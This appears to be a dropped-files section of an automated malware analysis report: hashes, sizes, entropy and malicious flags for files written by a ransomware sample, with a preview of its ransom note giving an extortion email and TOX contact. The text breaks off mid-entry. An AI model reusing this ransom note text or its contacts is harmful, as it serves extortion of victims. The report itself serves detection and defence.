                                SSDEEP:384:fsngrTVXsni/rWBSFTmHeN8qMCfWI/rTSfKAPxu2+zZ+VOP:RtsOrW+qHPqvOI/fEKb2+zZ7
                                MD5:69604DBC1506C4A3224D024C2158ADED
                                SHA1:09169F93CA1E75C60B6E83DC9C753F4E415BCE02
                                SHA-256:ACFE38285286844888286D48484F37460038EFEA5196AD8908DC181D3024D572
                                SHA-512:C5973E947E4E1BB62B335C68B5E510368C81F51F1DDE5A9D161BA095F802E9659ED223BAD4FB9627F69DA100D8655950F55B551222813C9EF976DEDB50D270F1
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):77237
                                Entropy (8bit):7.997643885981981
                                Encrypted:true
                                SSDEEP:1536:V5TUm4BbwyLpZD1awVeWSgecQ5MF0iHVd0sN2rz0gWTu9PkbsyKDeqXY4:V5TfGAdXJ55MF0iPdsrzAuNcKDeP4
                                MD5:7346C9D2EB98AC1075346703DECC8928
                                SHA1:1D26E6E6866C90EBA8EA72432C10236783F81FB2
                                SHA-256:7ABC1C0465643D5EFC880C750C81FA5867C7F52EE30C3C0A5526DE468A966A87
                                SHA-512:82E9BE820F0D6945BE604C751833636E3FECD9A5C3C37FF5563CFCB49120EC2D5F61043641756283CAE3B89B9352B2C454977BF69186CEF5F2DA7324E03B37D2
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):35679
                                Entropy (8bit):7.994921127201841
                                Encrypted:true
                                SSDEEP:768:3B0wgAmKWDgjLyOrqFl2CMgBEE2xQFCX5aymigojkPHVPaq1:NJkgj2Qq0Y70QYwymR1L
                                MD5:C70F74B728F81348721FF3A5F0E7F7D3
                                SHA1:1362BBF0A5B3CB02916F044DB7450D4EF2779849
                                SHA-256:A500DE3C420FDEA4721CD03F67E4DD7F97ABEA28D6DA729ECAB8F27C0D59AAF4
                                SHA-512:BD71CC39EF3E09CF3EB05A41503C379ABD9FE82F7282558457121CC0A710428399CABF283473899FE7BA0CDA92537BECA64418F371BDBB8FED951DDC34020E7C
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):38984
                                Entropy (8bit):7.995551107013911
                                Encrypted:true
                                SSDEEP:768:FAb2yKLIdr3OMqjIiCXxL7JfKtq14bOgDP9Be:3LKreMqj2xL5Eq6btDPu
                                MD5:C24155123912F79D83770B34DC14F774
                                SHA1:7E7FF4C6E5D56F127848BFE34F6DFF49B307E626
                                SHA-256:626AE14D43F7D4659BA5456AB4EA79625498265B18336AE9AF9DAF2567C5703E
                                SHA-512:F4FCCF9E7C0E5C31F85124F2B922CFD7BFD7BF52D0897620A2A5450AB6F9338CAAA94E94F0AE6107E0D6343539CDBE7F9D3B3E65E6FB06C54170D95CE438D423
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):45110
                                Entropy (8bit):7.99567981422741
                                Encrypted:true
                                SSDEEP:768:4g4PTMQ9KM3DkxVjidsoRarLFOAlIeEWw1f1mCLmoYgwx1Osykl90+q:4Z/97DqUdsoRGLoASeUx1xmZg61Osyke
                                MD5:FD29DCBE15C9E332B676FFCCDD174B7B
                                SHA1:33652E8C84860F98B1E3B5C853E6ED38DDB056FC
                                SHA-256:9D8AC44E2DD6BD1E979D2E2B2AF418B982F2E7F537259FBE7909302DE43A6FCC
                                SHA-512:ADF690D0D4A7E952C4131891ABEF87E770ECC7B8903A9E50DA4C821464BF9FC153192847789182065C74AD6042B9F0E4CAB74F8D54CDAB03DDA5E5CE2FE71442
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):43041
                                Entropy (8bit):7.996224052476002
                                Encrypted:true
                                SSDEEP:768:+EharlTbhn0CpXecGIU3hEYKKjQujfYhg6vm03Fy3GAzBFXHbdKH6MynJg2mC:bWBn0IhOhE1kQujfYbvVFQ1FXxsmg2h
                                MD5:7D1665A1790A327D64F06619B7587CAE
                                SHA1:D5E2D7E20B3F2CB3A10C6E1493F43515DCB686CD
                                SHA-256:2EE479729E4780F1C4E78D5E737F3AF391A39A44F853CEDFF516156AC2AE906F
                                SHA-512:ECD9963E19E44C17DF83C4A3551A4B9D6CEBE983E8558C550B9FF12D6208A3E1AED2A8806C748939D4E61AA8E245613C48197CD14DAB2BAF1EA8B5CF569BF9D9
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):78202
                                Entropy (8bit):7.997756107228158
                                Encrypted:true
                                SSDEEP:1536:FMh8tqY2qLOzI4hAd5u5rd0PPKK4/1pC2ZDo1U9SqTDlR:iTY2y2IqKe00tpvDrDlR
                                MD5:24233943B7B8B1FD94D72A6152057C73
                                SHA1:586C1D0A1F74D22A202E28D8798D936198D4C2D2
                                SHA-256:10AC3A1641BC41D16184766C45F7A989021614757FA546349E96D9B0EB79E847
                                SHA-512:CB83CBF78340EF759C94B09491D2CF3C08106C738922C4B05D4D340B58DBD3EE4E96B534177225516C7D0D9D1A5AEB6A6F4C1AC1C56388F2148DC826184648E8
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):28699
                                Entropy (8bit):7.993136863460101
                                Encrypted:true
                                SSDEEP:768:e4GxgW0PRBlfN7X5ycjdVKpYCuSmb8+vufXrtJ:et05d7F2pYCu6/f
                                MD5:F932A11B4954C664991767791003591B
                                SHA1:CB0258F139F1BC7489D0202BC8841D4E5BD7A230
                                SHA-256:51E2CB97B17955DF7F613821BABED7858E3A46C7CF64DF36D9C7E657A72D7F25
                                SHA-512:E47EF7BF7DCAEEACC27E76C2603C2F6AEABF9D18F54225C0480344BFA259C93393980547F9B83921C946E6D6A6A057DFE3C071AF6A4AFC630C032C3F7D7E9059
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):59065
                                Entropy (8bit):7.997113050116395
                                Encrypted:true
                                SSDEEP:1536:PqLlcryUBAjN2zAsO9Iv4duCmyKlKHjrQGQqlCi:yGBAjoA5ev9kT1FYi
                                MD5:E750745D0B4B11DAA75565E42843A8E1
                                SHA1:C616D2DE9A3A4D1B655AFB3BFC0941B131E28B04
                                SHA-256:B2B185D64D526199527FD8AB802642A63639755B0EAAF0A4EC11AC4F167BBF9B
                                SHA-512:04A4B80F02B5214846E8D4E24F978C2248D8C958872102DA537C105A6611B392F4BABD8B2BB502EFF35ADD6FC195C1831C282738AF43BC369BE1BF1C099377F2
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):42453
                                Entropy (8bit):7.995573747932359
                                Encrypted:true
                                SSDEEP:768:HAqdbccge+9bPxbsBtukUD2Wqbwp+8BndMJaGzhl+0xXZUL1YoJjCNLtNso6+:gSAFzbPxsrnUD2hbwnnG1LwYoJyDJ
                                MD5:EB2A78AAF01CA6C1A58CA8B0916B926E
                                SHA1:CE8E82E50839F354715631913199E19A49BA4B2B
                                SHA-256:53B56BBB778F79797E8582D924944F8C50702837BA25CC92ACC7FCFCFCA6EA97
                                SHA-512:4858520683108887D0412FEFCA6E4429B918956C15D61A85A68EF50725CB09C5B6DA2078BF30F3B2515D2DAD24D5468CAD1337B3A99E48B411E9D9AC37F45F9F
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8925
                                Entropy (8bit):7.978752689949959
                                Encrypted:false
                                SSDEEP:192:1/KyNwA/nAPkIMPSDFpKvOqgJY2oW50xrStPolCPP+VO7:DNikKFwvpg10xrc1P+VO7
                                MD5:EB7614060CE1E4E9100B357FD9C90347
                                SHA1:01CF4F11C57724808AE112CD3729EB50A7F34A1E
                                SHA-256:9116679FADEA7CB892D1210C6CFAA97971C928C74539C7DA0143A04B734B7B54
                                SHA-512:97B395B4E158D77DA4169F0FC70B55F18E7CEB253D9C1D420062B43DC87AE7ADED970A4E04486ADB80659FBD7096B563996C9FA0D74AA0054E7946D200F68949
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9626
                                Entropy (8bit):7.9858070233296665
                                Encrypted:false
                                SSDEEP:192:op4QZRQ3O6GiXHHVMmdyM/c+Tg052gu3kvp0JWc66yoySgNT8lZ8m1+VOG:oWQfQ3O6GCVMQ5BD2gu3+0JO3HDYlZ8h
                                MD5:196C668F69ECA312250AC487819849D3
                                SHA1:30548B6F7948BE8F02A1A8DD5B1F3698642F839E
                                SHA-256:5B12AFE011E8E02D42DBF27B02D5042C35C05D175FCB7EF5EB6537A367ADB04E
                                SHA-512:0576B46B84102FBC778C008CF7778BA6B8B58FBE8D856B1CD43F6D79C621753B5EDEF8A4653E0B8731B4B29736BFD5CBD93E9A6C436F10013296FBC24B692B83
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6867
                                Entropy (8bit):7.970007115002978
                                Encrypted:false
                                SSDEEP:96:DTq4EKb2SGL39Pik6p1AMB9kmWLdN+WvPj1ktYeCmCrt7B0IwM7E1k6WEqydevul:D1d29TBuAK9kRRtPGtYb/rZo7Wg+VORl
                                MD5:CCA8CAB2153A910A214B833891E16603
                                SHA1:0C5605265215AEEBA3ED785F7DE69B300DD1AFE9
                                SHA-256:272717E9239CE897D4D6225AB0BBCD7819325641A9EDE35F74BC1D78D5917595
                                SHA-512:6D422D95A93FE2E031500BA6E3F7331234E4EB401F0603F96647B30C72EDCE367B9A6BAEE09FBB22FC38778F38FB4DB6376D0E254682F1A7F98949DF9D8989D9
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):47388
                                Entropy (8bit):7.995759484423379
                                Encrypted:true
                                SSDEEP:768:RfmHq9KPPjKgkSaI1goEj5SeUaSMI3gIItJXiKUyDPz3AeKYWFnlgfiTAInAi:RfmHqEXOH68c/aSvI3UyP3AebmnKfiTP
                                MD5:F4A1F04E141A236DD5517134129D2728
                                SHA1:262552ED8696CB4D0E5DF2A34D5025D951F57485
                                SHA-256:F3575A69AF187C32139BECC5F512011EB30C983ED99EF671D1363F1436E8F112
                                SHA-512:BA239083898EFC8609FAEE6C0E532F23FB5E1733017F82F43BA9F4E59765463528128A90454258F3EC433810827EE1FC999B4977C598CDF2150A7EEDDDFC68B9
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):34074
                                Entropy (8bit):7.994342177268926
                                Encrypted:true
                                SSDEEP:768:dF1MIgc0Fh1Gf1GlZLgCSO/JTVYySl/fd051wt4AHxDE:dbpR0Fh0olRlbJhYyS9K5ytVHa
                                MD5:A78E25DA6D44222A9B40499B3CA0A4A1
                                SHA1:F87DAD593ECC249FE35DF7D2F986D2626346B6FB
                                SHA-256:95715C03847D0E01335F1A40E5014368F08B49C013DF235CE2C694291A9D1C58
                                SHA-512:239632071AB2E366F4CC5E7B4E98058D530A648E0397AA9BB4685A61BE4E0B676A5BC185F157516CC23953D03CDF9E0D5564CC7728AB11FDF6E4B088B0C13671
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):12276
                                Entropy (8bit):7.986194181461965
                                Encrypted:false
                                SSDEEP:192:Nnd+dMnS2azSZudYvoeBnsogju7jqRlar81gnAORwaxqzA32IgPAVrgSe/PVj+VN:Nnd+dKYSZud/aYjmjqj31gnACwSqFIgu
                                MD5:4938D51A79C1731F0362506F51A47158
                                SHA1:D975477E9824E957BB6076DCF52A771B4F783D5D
                                SHA-256:72797D6B41E53F380F56A98D38CD97E87E883DBA7869EB5C91FFAE204CB4F395
                                SHA-512:A78847F9F0DDE265356F448C9EB4D8516466EB4EBA519E5833292DE582F91B6C371E1C425FE663579E52E713F4B7BD264FE871D2DAE3C93B1C543160F5DED860
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):822
                                Entropy (8bit):7.7309416836348674
                                Encrypted:false
                                SSDEEP:24:diuDCxMbNz5z/wpDyYPGTNj0hOHAVMJg6WXs9dE:dxDaezN/WyYu+MAVMJg6TU
                                MD5:AB75D8C037578B71855A1986B041C955
                                SHA1:6F69A1E249BBEC66A8095DCC1DD717F48CB4B9A7
                                SHA-256:B299327BF45E050C7F6181C07594E8DA0A3AEF871E5639CA0887E7E820C5710F
                                SHA-512:24C62F553705CAE03B8997B06AF92ACB3684C31E494AAB11BD5DFCC3FAE1CCB8F10E18D4DDF57F57EBA9AAC28D11EFD0123A9992E7C0A34D34B7867C4CF0A4A8
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):33529
                                Entropy (8bit):7.995234203898862
                                Encrypted:true
                                SSDEEP:768:9fmVrJYLP8NTGzR3oiwZqi5P9op6fKzXXeDKjnI/yjAnGkjuzrdU:9KJ80dGzZ3Cg6WHrViqK
                                MD5:FC56C9037FCEE5E6FDA29AC1EAF1BE57
                                SHA1:71C9A8E693119C02C14CEFF8A7A162D3FCF6F102
                                SHA-256:DA9F11F3AAF37C541BA4F5A4E3A8C27219759BB7BB985A016DC34FF406045AE1
                                SHA-512:B96FDE5931A52866F5DB3519A8F0E98D6D817A16D600F3D1290D0B8B6224D7D18D1325C76A0B64E5E82427CEFCCEB3A0A1320108FAB25DF628EF5E8C504CE33E
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2373216
                                Entropy (8bit):7.227069398524338
                                Encrypted:false
                                SSDEEP:49152:oSXoV72tpzOhPwi1aCvY1U2AluS0RsG4fYw44RxL2:14zwiICvYu2wIsG6W
                                MD5:AA633D4C7C9C15C6DEBB2CEC9501FDA2
                                SHA1:DA983CB71CF57066108F647AEE05236919ACEDEF
                                SHA-256:A978B83E0A4F4833BD273D7A9EE981CCB539C79F14D624345FC4AA8C2CC470C8
                                SHA-512:373E088A2543DC494E9E75F11D163C35EED36047603B4B5E15B4E3A91EF9EFFECD83C8D3E726137F5A3FC310DA1358B00D0D84C0E34795FF38C5B7CE0DCF23BE
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):92207
                                Entropy (8bit):7.997951408458284
                                Encrypted:true
                                SSDEEP:1536:RbYV+FLE0z9WZ1tOu+hsUDwoUZb4dPw2q+1XDxWr64AZrT3JU:6V+FYE+XOXwow4lwIXDRhTZU
                                MD5:696D2CA1AF57D4D618905BF094584FAC
                                SHA1:D6B2E51167FA69B34568CE3726ECD4F0973BC935
                                SHA-256:ABA72D6685AD351F397FECCF732A25E40E29CB31712DE861D5D1FBD30E2E0418
                                SHA-512:7609D7FDEBA5E11AF13B00B3A402F99729F4B7B2E1232716F31B4AE1F683483A3AA6414CBF1D2358476A42306EA26356119009B84BAB3CCFCD2DC8FB63C6307B
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):72369
                                Entropy (8bit):7.997397042306235
                                Encrypted:true
                                SSDEEP:1536:NmNs1D50cNJks1xSZDfJTxtgyyK4LAuzfWzLAiyrbK0rr:ZfLjSVPiW41Xiyr3
                                MD5:55A4462794C4D62A168176F68CBC55A6
                                SHA1:F99C3A951F6C65175606567967418D6CC2607BBF
                                SHA-256:2D9F7E7EE22FE3F9C2248358AA9E6DE3690F33F1FA44FF3E7B6318EADBA17336
                                SHA-512:C1581EFCD2563780D4F4EC1E9EC97E5EA5C148C77A6B2867B86E17CDDCBA4D082FA113AAE1B58A2D55DF28B66C3418A2A3A60D6733B6424D6546B7CD3D621333
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):171232
                                Entropy (8bit):7.99877932025843
                                Encrypted:true
                                SSDEEP:3072:66tbjJoQBQYrpCQYDsa+gfih7kffgHYCwDRGNTejJMJ7XgLZIsTJh3t:6aJ5BQbRDszgqh7Hbey7XgLH/t
                                MD5:24EB09FA6E46F218CB62B6B0F8849263
                                SHA1:E8AFE1324F5929F7937490253D8F8FA691FFB678
                                SHA-256:6E04B515DA0A3792EC81DD9DF5A890B58DDE4FE43134616328AAA145F35B2850
                                SHA-512:9564896FA20B13E4784D0481EFBF62F79509813D8321254BE05609B6EDF172391470C1F06EC312CBFDF4F9A5FA792A84FFEBBF71C971D8BFEAFAB66EE95D70FC
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):66624
                                Entropy (8bit):7.997080360478528
                                Encrypted:true
                                SSDEEP:1536:Ns0EZ2y8+chPsz+181Tdx5zOVPVeTwPsxDTLaF:6zZ2Fh0aS1ZiVNrP4TLaF
                                MD5:CF9220E05F6B4F532F19CE62890BC8E3
                                SHA1:6A0E12DF092664D216B1FC065624B5F55C156FAB
                                SHA-256:07D88FDC6DAE4DD3E056353BBE9C18697D383F5EC52C9357506D1352F52E7C8E
                                SHA-512:D75CBDD69494242C56DB8431FB6D7A0F237186EE264226C073515E16B69AB3605F1DF1D2816C72BA1F1A6854952803602B944B0892ADF81FA5FA977DC06B4D1F
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):12864
                                Entropy (8bit):7.986297556161904
                                Encrypted:false
                                SSDEEP:384:0XRMA4Z2zFtbva9mCBgf1P/DST+J1dKH8ZoUHX+VOI:vA+qPdCBgf1D9108ZoeX0
                                MD5:D268FFE2C40AE8A0A6879586D0CC7D00
                                SHA1:A222C77006F1BF7574BAB8179C6DE1FDE73729E4
                                SHA-256:4AC9A9994FC9FF2A0E34237C9A344200F6AB55183830B3CB57A111C9271EBABF
                                SHA-512:1E07387E89CCD26E8A58D1939B0A00DCFF63FE4ED5AD3086ECF601ED8EB9ECC36B22FDD8743A348F5847E5055664535E7EDD9A97D1F6F2C528FA1321A4E2A082
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):16448
                                Entropy (8bit):7.9887060938908165
                                Encrypted:false
                                SSDEEP:384:aOsn8nQ+wtdqASIopCnSiOHz9+31ZGCTDshjFt9sb4aFo8h+VOh:a7np+wtdqbTes9MJT4179RaFo8hN
                                MD5:160399FA63DABAE089ECC49717A9AA50
                                SHA1:60E741DBDB60D6CC8CB33F7F95CAA5BB58702B08
                                SHA-256:C85FD6DDCFA50BBCF63C50C77B4036442DB46C361221F504225A8EA4ADF264BC
                                SHA-512:D492753F27D80A0D1B828249D9B8417BEB8B8B25A1AEF95FB90616A23F7115447DC61A724AD11B8949BD77AB8BB1A9EEB17EC3026460F1DBB3843C4662EE6163
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):17984
                                Entropy (8bit):7.989260435680841
                                Encrypted:false
                                SSDEEP:384:T1eiU5wdx3wpG2CtFtpBMjOWEWAU4cwY5FsIdoJglCOXdf5iLtMZD4jEDxP5p+VB:TfOOpcviBMnAU/X9oJ0XGO4QD95pg
                                MD5:8F944268E1221D0DE23D5502289D7F96
                                SHA1:E25B5AB7E0E7B9935C25FFEA704FEA46DB98594B
                                SHA-256:56B6B00F70C11D5F8E1CF5610979DA7C4AC933B6C9C0904310AE471A1EC1ABF1
                                SHA-512:1D47E7EE798C9F762A4D76C533B1F88A61523CECB16C376FC7B70E16D4613F65A8BB0183E3C465BE3B01094E79E9D8E83DA1DE0A88377B1F3FAD83488A1CF635
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):18496
                                Entropy (8bit):7.988552136784182
                                Encrypted:false
                                SSDEEP:384:LdrbtI83SVU9leVmb60DfEIA1zHCMJzPFG5Oe8kUKe9d9MNo8gMqEDQ+VOl3:RrbKhq9leVmmccNNmUSqfd
                                MD5:AA171E4B73C2DC8058BC29FDD9AA45C0
                                SHA1:F42A03A982C880492DA01EE52E760BA2BF90C5A0
                                SHA-256:8714048B56D0C6132E9FBE06D202B66ABA125FCE89AA2C8C49EADCD3708366B2
                                SHA-512:C9E3EDC0DC26044B0F9B6AD7D7150D30741B697B9E5690BBE3CC4FECDCCD4022BE412984CD263AEE761A4D1B26A2110228DEDF4D0F56108715973D44A9E7EDDC
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):14400
                                Entropy (8bit):7.986587460488451
                                Encrypted:false
                                SSDEEP:384:DPuCT8a2JikFsrBwr3n5PkTnKIf1RdOrDAc+VOq:DPH49Ji+D9BKKrEcG
                                MD5:EA0DC7A7FFBFCC60CBBE8B0B02B228C6
                                SHA1:532695866055A3B9D432FD13F1FD34044325ED6D
                                SHA-256:30A74DAC7EC18FFE46672863087D7E053881D16340263F055538414AB10BD674
                                SHA-512:478C0FF4B48FA09C635993855D1708707951693BE780EEDA792F047B77C7514EB14E546FA9A59B525488D7B1AFFAD7045088B68348ECF2B45CF4677A5FBF0957
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):12352
                                Entropy (8bit):7.985652231270132
                                Encrypted:false
                                SSDEEP:384:6n36ogLWbrGQ0DXgE0Lvk0/dV4FV3l8Pt+VOj:63eLvVLIg0r4FV3l8Pt/
                                MD5:E834172EC7BBD9CBE88F4FBB1C22A1F7
                                SHA1:639E4E274D0F204B0EFC2DEECF980E64BE64A365
                                SHA-256:969FBBB903626DF64C55F617658FA0114B80056A3AFBB280191F679F2ED2F7D8
                                SHA-512:9B94E30B8B4D3335C2B4CA2C04707CF015321EE1D4FBFE98CA990EE47EE00DCA53C52CC5BE06C11E6F3E63804AB651E0EFBB033949042619804AFC225EB8FCBB
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1225440
                                Entropy (8bit):7.110335695382455
                                Encrypted:false
                                SSDEEP:24576:JA0qrzTILfgikyNZ0mZ/VNGqhHfaU4Y0NM+fg5LD6ipY4OxJWf3AIarI8yH5Am:4rxcC4OxJQa2HZ
                                MD5:CC4432342BB0EA9C9984D02C0E18E417
                                SHA1:F0681FE6626C26EF92427561B62C447EB8C4894A
                                SHA-256:73087A4CC8CDE3005550DFB941EB9F10BB61B96AFF81E848538642F442441C4E
                                SHA-512:3065C2B03E1FE7E4C302179665A688053A1C26006997A4B224C015EC473F3FE739D1EA21E231D415E4D03F5CCE0937329E6886332A041F786B0DB757A9937523
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):22240
                                Entropy (8bit):7.9918066412935165
                                Encrypted:true
                                SSDEEP:384:R8RPpKyikMq0g34qtKfSjPTGwx2qS99KbkR7FiQRXrC7eS2Ah+VOg:6PpKyie02UKzThx21/rLTFen2Ahk
                                MD5:4965A7A05326AE1ABCD697DF17EAD004
                                SHA1:F6653735F926634947EB765EDB74058B571F299F
                                SHA-256:519A6D1421C60000E86AEB8A66A6C69BD022BCBBDD6653B6C26F2818FF008274
                                SHA-512:809D383198D910ABD46A4CEB358DEF63D089F4BC0648ABE1261F5FAB2FECE8B776231AD5B41669F327717A5724F1DF69B08AD9520FDBFB7BC2027945CBDC46E7
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):152288
                                Entropy (8bit):7.999000054378898
                                Encrypted:true
                                SSDEEP:3072:CB3fqO7ZrbcGHeYurqjPhvwz/DeazV4FXxpSvh8ri8b0OFf+E/xRXrMphmF:CVjnpX6qbhvGbeahC4vh8jf+EJNrImF
                                MD5:B0D2F4C3E7433B02763CACF14555AC37
                                SHA1:6E7A2F74B67939295C2CBD6E5EFB75CE40D8850C
                                SHA-256:2FE6D9553D5D547CFFEF7B897E4742F23438E7A4BA3B5178BF6071EB004D0FAA
                                SHA-512:244F94E20AEBC5ECC4452127B76167BB8332B7CB40F04CBBC33D5D69C5D327DFEB2B031B81530C679BACDC189A0BE66E84DBDE540F1D55CE54856201CB55D804
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):69344
                                Entropy (8bit):7.99729730135454
                                Encrypted:true
                                SSDEEP:1536:8JQikin9kIVdO+K/BaJPnLJx37JefPJ9jTHMtNMnMu+clnMNhBt3:Rin9kIV0+0ALX3Ifh9jDMtWJ/Mfv3
                                MD5:D7A09623574E8DCF2812B319BB86FBE5
                                SHA1:EC4F1C38584EF40D62A132E366362186B61B846E
                                SHA-256:01637B95E9F001AF2B664DC85307DDA1B208C33FA43DE698C1C783F490372030
                                SHA-512:3CAB907A1F9D3D13CD10A0F901D81A291475261B7C50208A4FEB475C6691BC755322B34C9150BC4E242ACDAED31B3B86987556176209B4B8725B547BD28254DF
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):448736
                                Entropy (8bit):7.742703452746421
                                Encrypted:false
                                SSDEEP:6144:D8vdlobcx94J45VGTCPqAKaVJ9/tCOjfjFLX1Luu4JUfHtMUj955JNtdgC+nlKG:DhbcxG6rPqgJ9BRtBGQFtdgjlr
                                MD5:208C15112222EA11D01738CCAB047058
                                SHA1:6DB8EB73CB54153A0F10EA58418B5FAA4CA1443A
                                SHA-256:8E61BD39CD5724A3F34018910CE2535FB6B5A115C49B6690AE12365550A03FA8
                                SHA-512:4E3A4638B45CB25B9B786378C1903D02A50B1AAC78C7BF70AAC0816C44C75EA335B37E42E63534DE85249F3D00261AD1B6C3E8A9E7A6797980F7E8840C913B87
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):32480
                                Entropy (8bit):7.993860741449151
                                Encrypted:true
                                SSDEEP:768:ybqdogMeodfu87d87VaNbTXJmbmbmcLscyLwBrDNKk:PdogroZu87dGauybAG
                                MD5:9F4EFE8BAD680F19868B775ABEC37AE2
                                SHA1:E34B7AFAD8E19CE1821FD4EA333F76450C34401E
                                SHA-256:65F8E5926EF9A99B5846349BD2B933787E73A6F1A1558CC26CD7D52813A1F975
                                SHA-512:834120B3133C4FC9C765A2F19CA2C0281EE9B2449E7A83AA3B7FE3E4CC9E2F81DAF29953178D633451E723D2BADAE33C62ADCABAA862FE0E35234CAA7CFF48BF
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):29408
                                Entropy (8bit):7.9934654335168265
                                Encrypted:true
                                SSDEEP:768:5TJLgkdt3Wv9Ds1tDt/RsCu77RiEtcJmiGNIK1EnmlN+y+UH:Pn/W1Ds1PaP/gEQmiAEnmlN+H+
                                MD5:D48E9C2D736F162D5B0A5B333DBE43B0
                                SHA1:E1C9955A57DC4664DA2F31F51A05D905B4A1D8CD
                                SHA-256:2DD3769FF99BC204A1BDE905067F8571473148E4B138B2B3392AD555D2ADEF06
                                SHA-512:A02D82AE9D5D6FB3C144742A8635E2DDF3338880B2596F28CCE682989155DD76741B9CE0AC4419CEDC74ED07E8587F573AF1B9F485D77F8F40F4E20D40E21FA3
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):138976
                                Entropy (8bit):7.998712340519312
